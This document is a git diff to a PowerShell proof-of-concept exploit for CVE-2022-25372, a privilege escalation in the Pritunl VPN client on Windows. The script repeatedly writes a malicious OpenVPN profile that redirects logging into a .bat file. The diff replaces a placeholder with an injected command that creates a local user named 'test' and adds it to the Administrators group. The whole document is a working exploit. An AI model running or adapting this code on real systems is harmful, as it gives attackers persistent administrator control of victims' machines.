diff --git a/CVE-2022-25372/CVE-2022-25372.ps1 b/CVE-2022-25372/CVE-2022-25372.ps1 index 2b3412e..49aa2db 100644 --- a/CVE-2022-25372/CVE-2022-25372.ps1 +++ b/CVE-2022-25372/CVE-2022-25372.ps1 @@ -1,2 +1,2 @@ $profile_id = ((Select-String '{"name":"privesc"' $env:APPDATA\pritunl\profiles\*).filename).split('.')[0]; -while (1){"client`ntls-client`ndev TUN`nlog `"C:\\Program Files (x86)\\Pritunl\\ipconfig.bat`"`nauth-user-pass`nca `"INJECTED CONTENT`"" | Add-Content "C:\ProgramData\Pritunl\$profile_id"} \ No newline at end of file +while (1){"client`ntls-client`ndev TUN`nlog `"C:\\Program Files (x86)\\Pritunl\\ipconfig.bat`"`nauth-user-pass`nca `"& net user test SecurePassword123 /add /expires:never /passwordchg:no && net localgroup administrators test /add &`"" | Add-Content "C:\ProgramData\Pritunl\$profile_id"}